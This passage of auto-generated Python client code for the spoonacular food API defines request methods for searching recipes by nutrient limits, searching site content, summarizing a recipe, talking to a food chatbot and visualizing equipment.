:param float max_vitamin_b2: The maximum amount of Vitamin B2 in milligrams the recipe can have.
:param float min_vitamin_b5: The minimum amount of Vitamin B5 in milligrams the recipe must have.
:param float max_vitamin_b5: The maximum amount of Vitamin B5 in milligrams the recipe can have.
:param float min_vitamin_b3: The minimum amount of Vitamin B3 in milligrams the recipe must have.
:param float max_vitamin_b3: The maximum amount of Vitamin B3 in milligrams the recipe can have.
:param float min_vitamin_b6: The minimum amount of Vitamin B6 in milligrams the recipe must have.
:param float max_vitamin_b6: The maximum amount of Vitamin B6 in milligrams the recipe can have.
:param float min_vitamin_b12: The minimum amount of Vitamin B12 in micrograms the recipe must have.
:param float max_vitamin_b12: The maximum amount of Vitamin B12 in micrograms the recipe can have.
:param float min_fiber: The minimum amount of fiber in grams the recipe must have.
:param float max_fiber: The maximum amount of fiber in grams the recipe can have.
:param float min_folate: The minimum amount of folate in micrograms the recipe must have.
:param float max_folate: The maximum amount of folate in micrograms the recipe can have.
:param float min_folic_acid: The minimum amount of folic acid in micrograms the recipe must have.
:param float max_folic_acid: The maximum amount of folic acid in micrograms the recipe can have.
:param float min_iodine: The minimum amount of iodine in micrograms the recipe must have.
:param float max_iodine: The maximum amount of iodine in micrograms the recipe can have.
:param float min_iron: The minimum amount of iron in milligrams the recipe must have.
:param float max_iron: The maximum amount of iron in milligrams the recipe can have.
:param float min_magnesium: The minimum amount of magnesium in milligrams the recipe must have.
:param float max_magnesium: The maximum amount of magnesium in milligrams the recipe can have.
:param float min_manganese: The minimum amount of manganese in milligrams the recipe must have.
:param float max_manganese: The maximum amount of manganese in milligrams the recipe can have.
:param float min_phosphorus: The minimum amount of phosphorus in milligrams the recipe must have.
:param float max_phosphorus: The maximum amount of phosphorus in milligrams the recipe can have.
:param float min_potassium: The minimum amount of potassium in milligrams the recipe must have.
:param float max_potassium: The maximum amount of potassium in milligrams the recipe can have.
:param float min_selenium: The minimum amount of selenium in micrograms the recipe must have.
:param float max_selenium: The maximum amount of selenium in micrograms the recipe can have.
:param float min_sodium: The minimum amount of sodium in milligrams the recipe must have.
:param float max_sodium: The maximum amount of sodium in milligrams the recipe can have.
:param float min_sugar: The minimum amount of sugar in grams the recipe must have.
:param float max_sugar: The maximum amount of sugar in grams the recipe can have.
:param float min_zinc: The minimum amount of zinc in milligrams the recipe must have.
:param float max_zinc: The maximum amount of zinc in milligrams the recipe can have.
:param float offset: The number of results to skip (between 0 and 900).
:param float number: The number of expected results (between 1 and 100).
:param bool random: If true, every request will give you a random set of recipes within the requested limits.
:param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_recipes_by_nutrients_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.search_recipes_by_nutrients_with_http_info(**kwargs) # noqa: E501
return data
def search_recipes_by_nutrients_with_http_info(self, **kwargs): # noqa: E501
"""Search Recipes by Nutrients # noqa: E501
Find a set of recipes that adhere to the given nutritional limits. You may set limits for macronutrients (calories, protein, fat, and carbohydrate) and/or many micronutrients. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_recipes_by_nutrients_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param float min_carbs: The minimum amount of carbohydrates in grams the recipe must have.
:param float max_carbs: The maximum amount of carbohydrates in grams the recipe can have.
:param float min_protein: The minimum amount of protein in grams the recipe must have.
:param float max_protein: The maximum amount of protein in grams the recipe can have.
:param float min_calories: The minimum amount of calories the recipe must have.
:param float max_calories: The maximum amount of calories the recipe can have.
:param float min_fat: The minimum amount of fat in grams the recipe must have.
:param float max_fat: The maximum amount of fat in grams the recipe can have.
:param float min_alcohol: The minimum amount of alcohol in grams the recipe must have.
:param float max_alcohol: The maximum amount of alcohol in grams the recipe can have.
:param float min_caffeine: The minimum amount of caffeine in milligrams the recipe must have.
:param float max_caffeine: The maximum amount of caffeine in milligrams the recipe can have.
:param float min_copper: The minimum amount of copper in milligrams the recipe must have.
:param float max_copper: The maximum amount of copper in milligrams the recipe can have.
:param float min_calcium: The minimum amount of calcium in milligrams the recipe must have.
:param float max_calcium: The maximum amount of calcium in milligrams the recipe can have.
:param float min_choline: The minimum amount of choline in milligrams the recipe must have.
:param float max_choline: The maximum amount of choline in milligrams the recipe can have.
:param float min_cholesterol: The minimum amount of cholesterol in milligrams the recipe must have.
:param float max_cholesterol: The maximum amount of cholesterol in milligrams the recipe can have.
:param float min_fluoride: The minimum amount of fluoride in milligrams the recipe must have.
:param float max_fluoride: The maximum amount of fluoride in milligrams the recipe can have.
:param float min_saturated_fat: The minimum amount of saturated fat in grams the recipe must have.
:param float max_saturated_fat: The maximum amount of saturated fat in grams the recipe can have.
:param float min_vitamin_a: The minimum amount of Vitamin A in IU the recipe must have.
:param float max_vitamin_a: The maximum amount of Vitamin A in IU the recipe can have.
:param float min_vitamin_c: The minimum amount of Vitamin C in milligrams the recipe must have.
:param float max_vitamin_c: The maximum amount of Vitamin C in milligrams the recipe can have.
:param float min_vitamin_d: The minimum amount of Vitamin D in micrograms the recipe must have.
:param float max_vitamin_d: The maximum amount of Vitamin D in micrograms the recipe can have.
:param float min_vitamin_e: The minimum amount of Vitamin E in milligrams the recipe must have.
:param float max_vitamin_e: The maximum amount of Vitamin E in milligrams the recipe can have.
:param float min_vitamin_k: The minimum amount of Vitamin K in micrograms the recipe must have.
:param float max_vitamin_k: The maximum amount of Vitamin K in micrograms the recipe can have.
:param float min_vitamin_b1: The minimum amount of Vitamin B1 in milligrams the recipe must have.
:param float max_vitamin_b1: The maximum amount of Vitamin B1 in milligrams the recipe can have.
:param float min_vitamin_b2: The minimum amount of Vitamin B2 in milligrams the recipe must have.
:param float max_vitamin_b2: The maximum amount of Vitamin B2 in milligrams the recipe can have.
:param float min_vitamin_b5: The minimum amount of Vitamin B5 in milligrams the recipe must have.
:param float max_vitamin_b5: The maximum amount of Vitamin B5 in milligrams the recipe can have.
:param float min_vitamin_b3: The minimum amount of Vitamin B3 in milligrams the recipe must have.
:param float max_vitamin_b3: The maximum amount of Vitamin B3 in milligrams the recipe can have.
:param float min_vitamin_b6: The minimum amount of Vitamin B6 in milligrams the recipe must have.
:param float max_vitamin_b6: The maximum amount of Vitamin B6 in milligrams the recipe can have.
:param float min_vitamin_b12: The minimum amount of Vitamin B12 in micrograms the recipe must have.
:param float max_vitamin_b12: The maximum amount of Vitamin B12 in micrograms the recipe can have.
:param float min_fiber: The minimum amount of fiber in grams the recipe must have.
:param float max_fiber: The maximum amount of fiber in grams the recipe can have.
:param float min_folate: The minimum amount of folate in micrograms the recipe must have.
:param float max_folate: The maximum amount of folate in micrograms the recipe can have.
:param float min_folic_acid: The minimum amount of folic acid in micrograms the recipe must have.
:param float max_folic_acid: The maximum amount of folic acid in micrograms the recipe can have.
:param float min_iodine: The minimum amount of iodine in micrograms the recipe must have.
:param float max_iodine: The maximum amount of iodine in micrograms the recipe can have.
:param float min_iron: The minimum amount of iron in milligrams the recipe must have.
:param float max_iron: The maximum amount of iron in milligrams the recipe can have.
:param float min_magnesium: The minimum amount of magnesium in milligrams the recipe must have.
:param float max_magnesium: The maximum amount of magnesium in milligrams the recipe can have.
:param float min_manganese: The minimum amount of manganese in milligrams the recipe must have.
:param float max_manganese: The maximum amount of manganese in milligrams the recipe can have.
:param float min_phosphorus: The minimum amount of phosphorus in milligrams the recipe must have.
:param float max_phosphorus: The maximum amount of phosphorus in milligrams the recipe can have.
:param float min_potassium: The minimum amount of potassium in milligrams the recipe must have.
:param float max_potassium: The maximum amount of potassium in milligrams the recipe can have.
:param float min_selenium: The minimum amount of selenium in micrograms the recipe must have.
:param float max_selenium: The maximum amount of selenium in micrograms the recipe can have.
:param float min_sodium: The minimum amount of sodium in milligrams the recipe must have.
:param float max_sodium: The maximum amount of sodium in milligrams the recipe can have.
:param float min_sugar: The minimum amount of sugar in grams the recipe must have.
:param float max_sugar: The maximum amount of sugar in grams the recipe can have.
:param float min_zinc: The minimum amount of zinc in milligrams the recipe must have.
:param float max_zinc: The maximum amount of zinc in milligrams the recipe can have.
:param float offset: The number of results to skip (between 0 and 900).
:param float number: The number of expected results (between 1 and 100).
:param bool random: If true, every request will give you a random set of recipes within the requested limits.
:param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['min_carbs', 'max_carbs', 'min_protein', 'max_protein', 'min_calories', 'max_calories', 'min_fat', 'max_fat', 'min_alcohol', 'max_alcohol', 'min_caffeine', 'max_caffeine', 'min_copper', 'max_copper', 'min_calcium', 'max_calcium', 'min_choline', 'max_choline', 'min_cholesterol', 'max_cholesterol', 'min_fluoride', 'max_fluoride', 'min_saturated_fat', 'max_saturated_fat', 'min_vitamin_a', 'max_vitamin_a', 'min_vitamin_c', 'max_vitamin_c', 'min_vitamin_d', 'max_vitamin_d', 'min_vitamin_e', 'max_vitamin_e', 'min_vitamin_k', 'max_vitamin_k', 'min_vitamin_b1', 'max_vitamin_b1', 'min_vitamin_b2', 'max_vitamin_b2', 'min_vitamin_b5', 'max_vitamin_b5', 'min_vitamin_b3', 'max_vitamin_b3', 'min_vitamin_b6', 'max_vitamin_b6', 'min_vitamin_b12', 'max_vitamin_b12', 'min_fiber', 'max_fiber', 'min_folate', 'max_folate', 'min_folic_acid', 'max_folic_acid', 'min_iodine', 'max_iodine', 'min_iron', 'max_iron', 'min_magnesium', 'max_magnesium', 'min_manganese', 'max_manganese', 'min_phosphorus', 'max_phosphorus', 'min_potassium', 'max_potassium', 'min_selenium', 'max_selenium', 'min_sodium', 'max_sodium', 'min_sugar', 'max_sugar', 'min_zinc', 'max_zinc', 'offset', 'number', 'random', 'limit_license'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search_recipes_by_nutrients" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'min_carbs' in local_var_params:
query_params.append(('minCarbs', local_var_params['min_carbs'])) # noqa: E501
if 'max_carbs' in local_var_params:
query_params.append(('maxCarbs', local_var_params['max_carbs'])) # noqa: E501
if 'min_protein' in local_var_params:
query_params.append(('minProtein', local_var_params['min_protein'])) # noqa: E501
if 'max_protein' in local_var_params:
query_params.append(('maxProtein', local_var_params['max_protein'])) # noqa: E501
if 'min_calories' in local_var_params:
query_params.append(('minCalories', local_var_params['min_calories'])) # noqa: E501
if 'max_calories' in local_var_params:
query_params.append(('maxCalories', local_var_params['max_calories'])) # noqa: E501
if 'min_fat' in local_var_params:
query_params.append(('minFat', local_var_params['min_fat'])) # noqa: E501
if 'max_fat' in local_var_params:
query_params.append(('maxFat', local_var_params['max_fat'])) # noqa: E501
if 'min_alcohol' in local_var_params:
query_params.append(('minAlcohol', local_var_params['min_alcohol'])) # noqa: E501
if 'max_alcohol' in local_var_params:
query_params.append(('maxAlcohol', local_var_params['max_alcohol'])) # noqa: E501
if 'min_caffeine' in local_var_params:
query_params.append(('minCaffeine', local_var_params['min_caffeine'])) # noqa: E501
if 'max_caffeine' in local_var_params:
query_params.append(('maxCaffeine', local_var_params['max_caffeine'])) # noqa: E501
if 'min_copper' in local_var_params:
query_params.append(('minCopper', local_var_params['min_copper'])) # noqa: E501
if 'max_copper' in local_var_params:
query_params.append(('maxCopper', local_var_params['max_copper'])) # noqa: E501
if 'min_calcium' in local_var_params:
query_params.append(('minCalcium', local_var_params['min_calcium'])) # noqa: E501
if 'max_calcium' in local_var_params:
query_params.append(('maxCalcium', local_var_params['max_calcium'])) # noqa: E501
if 'min_choline' in local_var_params:
query_params.append(('minCholine', local_var_params['min_choline'])) # noqa: E501
if 'max_choline' in local_var_params:
query_params.append(('maxCholine', local_var_params['max_choline'])) # noqa: E501
if 'min_cholesterol' in local_var_params:
query_params.append(('minCholesterol', local_var_params['min_cholesterol'])) # noqa: E501
if 'max_cholesterol' in local_var_params:
query_params.append(('maxCholesterol', local_var_params['max_cholesterol'])) # noqa: E501
if 'min_fluoride' in local_var_params:
query_params.append(('minFluoride', local_var_params['min_fluoride'])) # noqa: E501
if 'max_fluoride' in local_var_params:
query_params.append(('maxFluoride', local_var_params['max_fluoride'])) # noqa: E501
if 'min_saturated_fat' in local_var_params:
query_params.append(('minSaturatedFat', local_var_params['min_saturated_fat'])) # noqa: E501
if 'max_saturated_fat' in local_var_params:
query_params.append(('maxSaturatedFat', local_var_params['max_saturated_fat'])) # noqa: E501
if 'min_vitamin_a' in local_var_params:
query_params.append(('minVitaminA', local_var_params['min_vitamin_a'])) # noqa: E501
if 'max_vitamin_a' in local_var_params:
query_params.append(('maxVitaminA', local_var_params['max_vitamin_a'])) # noqa: E501
if 'min_vitamin_c' in local_var_params:
query_params.append(('minVitaminC', local_var_params['min_vitamin_c'])) # noqa: E501
if 'max_vitamin_c' in local_var_params:
query_params.append(('maxVitaminC', local_var_params['max_vitamin_c'])) # noqa: E501
if 'min_vitamin_d' in local_var_params:
query_params.append(('minVitaminD', local_var_params['min_vitamin_d'])) # noqa: E501
if 'max_vitamin_d' in local_var_params:
query_params.append(('maxVitaminD', local_var_params['max_vitamin_d'])) # noqa: E501
if 'min_vitamin_e' in local_var_params:
query_params.append(('minVitaminE', local_var_params['min_vitamin_e'])) # noqa: E501
if 'max_vitamin_e' in local_var_params:
query_params.append(('maxVitaminE', local_var_params['max_vitamin_e'])) # noqa: E501
if 'min_vitamin_k' in local_var_params:
query_params.append(('minVitaminK', local_var_params['min_vitamin_k'])) # noqa: E501
if 'max_vitamin_k' in local_var_params:
query_params.append(('maxVitaminK', local_var_params['max_vitamin_k'])) # noqa: E501
if 'min_vitamin_b1' in local_var_params:
query_params.append(('minVitaminB1', local_var_params['min_vitamin_b1'])) # noqa: E501
if 'max_vitamin_b1' in local_var_params:
query_params.append(('maxVitaminB1', local_var_params['max_vitamin_b1'])) # noqa: E501
if 'min_vitamin_b2' in local_var_params:
query_params.append(('minVitaminB2', local_var_params['min_vitamin_b2'])) # noqa: E501
if 'max_vitamin_b2' in local_var_params:
query_params.append(('maxVitaminB2', local_var_params['max_vitamin_b2'])) # noqa: E501
if 'min_vitamin_b5' in local_var_params:
query_params.append(('minVitaminB5', local_var_params['min_vitamin_b5'])) # noqa: E501
if 'max_vitamin_b5' in local_var_params:
query_params.append(('maxVitaminB5', local_var_params['max_vitamin_b5'])) # noqa: E501
if 'min_vitamin_b3' in local_var_params:
query_params.append(('minVitaminB3', local_var_params['min_vitamin_b3'])) # noqa: E501
if 'max_vitamin_b3' in local_var_params:
query_params.append(('maxVitaminB3', local_var_params['max_vitamin_b3'])) # noqa: E501
if 'min_vitamin_b6' in local_var_params:
query_params.append(('minVitaminB6', local_var_params['min_vitamin_b6'])) # noqa: E501
if 'max_vitamin_b6' in local_var_params:
query_params.append(('maxVitaminB6', local_var_params['max_vitamin_b6'])) # noqa: E501
if 'min_vitamin_b12' in local_var_params:
query_params.append(('minVitaminB12', local_var_params['min_vitamin_b12'])) # noqa: E501
if 'max_vitamin_b12' in local_var_params:
query_params.append(('maxVitaminB12', local_var_params['max_vitamin_b12'])) # noqa: E501
if 'min_fiber' in local_var_params:
query_params.append(('minFiber', local_var_params['min_fiber'])) # noqa: E501
if 'max_fiber' in local_var_params:
query_params.append(('maxFiber', local_var_params['max_fiber'])) # noqa: E501
if 'min_folate' in local_var_params:
query_params.append(('minFolate', local_var_params['min_folate'])) # noqa: E501
if 'max_folate' in local_var_params:
query_params.append(('maxFolate', local_var_params['max_folate'])) # noqa: E501
if 'min_folic_acid' in local_var_params:
query_params.append(('minFolicAcid', local_var_params['min_folic_acid'])) # noqa: E501
if 'max_folic_acid' in local_var_params:
query_params.append(('maxFolicAcid', local_var_params['max_folic_acid'])) # noqa: E501
if 'min_iodine' in local_var_params:
query_params.append(('minIodine', local_var_params['min_iodine'])) # noqa: E501
if 'max_iodine' in local_var_params:
query_params.append(('maxIodine', local_var_params['max_iodine'])) # noqa: E501
if 'min_iron' in local_var_params:
query_params.append(('minIron', local_var_params['min_iron'])) # noqa: E501
if 'max_iron' in local_var_params:
query_params.append(('maxIron', local_var_params['max_iron'])) # noqa: E501
if 'min_magnesium' in local_var_params:
query_params.append(('minMagnesium', local_var_params['min_magnesium'])) # noqa: E501
if 'max_magnesium' in local_var_params:
query_params.append(('maxMagnesium', local_var_params['max_magnesium'])) # noqa: E501
if 'min_manganese' in local_var_params:
query_params.append(('minManganese', local_var_params['min_manganese'])) # noqa: E501
if 'max_manganese' in local_var_params:
query_params.append(('maxManganese', local_var_params['max_manganese'])) # noqa: E501
if 'min_phosphorus' in local_var_params:
query_params.append(('minPhosphorus', local_var_params['min_phosphorus'])) # noqa: E501
if 'max_phosphorus' in local_var_params:
query_params.append(('maxPhosphorus', local_var_params['max_phosphorus'])) # noqa: E501
if 'min_potassium' in local_var_params:
query_params.append(('minPotassium', local_var_params['min_potassium'])) # noqa: E501
if 'max_potassium' in local_var_params:
query_params.append(('maxPotassium', local_var_params['max_potassium'])) # noqa: E501
if 'min_selenium' in local_var_params:
query_params.append(('minSelenium', local_var_params['min_selenium'])) # noqa: E501
if 'max_selenium' in local_var_params:
query_params.append(('maxSelenium', local_var_params['max_selenium'])) # noqa: E501
if 'min_sodium' in local_var_params:
query_params.append(('minSodium', local_var_params['min_sodium'])) # noqa: E501
if 'max_sodium' in local_var_params:
query_params.append(('maxSodium', local_var_params['max_sodium'])) # noqa: E501
if 'min_sugar' in local_var_params:
query_params.append(('minSugar', local_var_params['min_sugar'])) # noqa: E501
if 'max_sugar' in local_var_params:
query_params.append(('maxSugar', local_var_params['max_sugar'])) # noqa: E501
if 'min_zinc' in local_var_params:
query_params.append(('minZinc', local_var_params['min_zinc'])) # noqa: E501
if 'max_zinc' in local_var_params:
query_params.append(('maxZinc', local_var_params['max_zinc'])) # noqa: E501
if 'offset' in local_var_params:
query_params.append(('offset', local_var_params['offset'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
if 'random' in local_var_params:
query_params.append(('random', local_var_params['random'])) # noqa: E501
if 'limit_license' in local_var_params:
query_params.append(('limitLicense', local_var_params['limit_license'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/findByNutrients', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def search_site_content(self, query, **kwargs): # noqa: E501
"""Search Site Content # noqa: E501
Search spoonacular's site content. You'll be able to find everything that you could also find using the search suggestions on spoonacular.com. This is a suggest API so you can send partial strings as queries. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_site_content(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The query to search for. You can also use partial queries such as \"spagh\" to already find spaghetti recipes, articles, grocery products, and other content. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.search_site_content_with_http_info(query, **kwargs) # noqa: E501
else:
(data) = self.search_site_content_with_http_info(query, **kwargs) # noqa: E501
return data
def search_site_content_with_http_info(self, query, **kwargs): # noqa: E501
"""Search Site Content # noqa: E501
Search spoonacular's site content. You'll be able to find everything that you could also find using the search suggestions on spoonacular.com. This is a suggest API so you can send partial strings as queries. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_site_content_with_http_info(query, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str query: The query to search for. You can also use partial queries such as \"spagh\" to already find spaghetti recipes, articles, grocery products, and other content. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['query'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search_site_content" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'query' is set
if ('query' not in local_var_params or
local_var_params['query'] is None):
raise ApiValueError("Missing the required parameter `query` when calling `search_site_content`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'query' in local_var_params:
query_params.append(('query', local_var_params['query'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/site/search', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def summarize_recipe(self, id, **kwargs): # noqa: E501
"""Summarize Recipe # noqa: E501
Automatically generate a short description that summarizes key information about the recipe. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.summarize_recipe(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.summarize_recipe_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.summarize_recipe_with_http_info(id, **kwargs) # noqa: E501
return data
def summarize_recipe_with_http_info(self, id, **kwargs): # noqa: E501
"""Summarize Recipe # noqa: E501
Automatically generate a short description that summarizes key information about the recipe. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.summarize_recipe_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method summarize_recipe" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `summarize_recipe`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/summary', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def talk_to_chatbot(self, text, **kwargs): # noqa: E501
"""Talk to Chatbot # noqa: E501
This endpoint can be used to have a conversation about food with the spoonacular chatbot. Use the \"Get Conversation Suggests\" endpoint to show your user what he or she can say. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.talk_to_chatbot(text, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str text: The request / question / answer from the user to the chatbot. (required)
:param str context_id: An arbitrary globally unique id for your conversation. The conversation can contain states so you should pass your context id if you want the bot to be able to remember the conversation.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.talk_to_chatbot_with_http_info(text, **kwargs) # noqa: E501
else:
(data) = self.talk_to_chatbot_with_http_info(text, **kwargs) # noqa: E501
return data
def talk_to_chatbot_with_http_info(self, text, **kwargs): # noqa: E501
"""Talk to Chatbot # noqa: E501
This endpoint can be used to have a conversation about food with the spoonacular chatbot. Use the \"Get Conversation Suggests\" endpoint to show your user what he or she can say. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.talk_to_chatbot_with_http_info(text, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str text: The request / question / answer from the user to the chatbot. (required)
:param str context_id: An arbitrary globally unique id for your conversation. The conversation can contain states so you should pass your context id if you want the bot to be able to remember the conversation.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['text', 'context_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method talk_to_chatbot" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'text' is set
if ('text' not in local_var_params or
local_var_params['text'] is None):
raise ApiValueError("Missing the required parameter `text` when calling `talk_to_chatbot`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'text' in local_var_params:
query_params.append(('text', local_var_params['text'])) # noqa: E501
if 'context_id' in local_var_params:
query_params.append(('contextId', local_var_params['context_id'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/converse', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def visualize_equipment(self, instructions, **kwargs): # noqa: E501
"""Visualize Equipment # noqa: E501
Visualize the equipment used to make a recipe. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_equipment(instructions, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instructions: The recipe's instructions. (required)
:param str view: How to visualize the equipment, either \\\"grid\\\" or \\\"list\\\".
:param bool default_css: Whether the default CSS should be added to the response.
:param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.visualize_equipment_with_http_info(instructions, **kwargs) # noqa: E501
else:
(data) = self.visualize_equipment_with_http_info(instructions, **kwargs) # noqa: E501
return data
def visualize_equipment_with_http_info(self, instructions, **kwargs): # noqa: E501
"""Visualize Equipment # noqa: E501
Visualize the equipment used to make a recipe. You can play around with that endpoint! # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.visualize_equipment_with_http_info(instructions, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str instructions: The recipe's instructions. (required)
:param str view: How to visualize the equipment, either \\\"grid\\\" or \\\"list\\\".
:param bool default_css: Whether the default CSS should be added to the response.
:param bool show_backlink: Whether to show a backlink to spoonacular. If set false, this call counts against your quota.
:return: str
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['instructions', 'view', 'default_css', 'show_backlink'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method visualize_equipment" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'instructions' is set
if ('instructions' not in local_var_params or
local_var_params['instructions'] is None):
raise ApiValueError("Missing the required parameter `instructions` when calling `visualize_equipment`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'instructions' in local_var_params:
form_params.append(('instructions', local_var_params['instructions'])) # noqa: E501
if 'view' in local_var_params:
form_params.append(('view', local_var_params['view'])) # noqa: E501
if 'default_css' in local_var_params:
form_params.append(('defaultCss', local_var_params['default_css'])) # noqa: E501
if 'show_backlink' in local_var_params:
form_params.append(('showBacklink', local_var_params['show_backlink'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/html']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
